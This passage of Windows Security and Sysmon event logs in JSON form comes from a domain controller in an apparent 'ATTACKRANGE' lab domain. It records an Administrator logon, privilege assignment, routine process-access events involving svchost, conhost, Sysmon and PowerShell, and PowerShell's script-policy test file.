requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x666e0","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{8325D2E2-F565-F530-B8F0-304DFF73B4A1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220468,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x666E0\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x666e0","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4397,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.189\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.189","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4398,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.189\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.189","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4399,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.189\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.189","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4400,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.189\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.189","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4401,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.189\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.189","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4402,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.189\r\nSourceProcessGUID: {41C8662E-20BB-5F25-0000-001091620600}\r\nSourceProcessId: 1232\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-0010A2710600}\r\nTargetProcessId: 1632\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.189","SourceProcessGUID":"{41C8662E-20BB-5F25-0000-001091620600}","SourceProcessId":"1232","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-0010A2710600}","TargetProcessId":"1632","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4403,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.220\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-0010A2710600}\r\nTargetProcessId: 1632\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.220","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-0010A2710600}","TargetProcessId":"1632","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4404,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.236\r\nProcessGuid: {41C8662E-20BB-5F25-0000-0010A2710600}\r\nProcessId: 1632\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_hnk1ce10.4ku.ps1\r\nCreationUtcTime: 2020-08-01 07:58:51.236","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.236","ProcessGuid":"{41C8662E-20BB-5F25-0000-0010A2710600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_hnk1ce10.4ku.ps1","CreationUtcTime":"2020-08-01 07:58:51.236","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
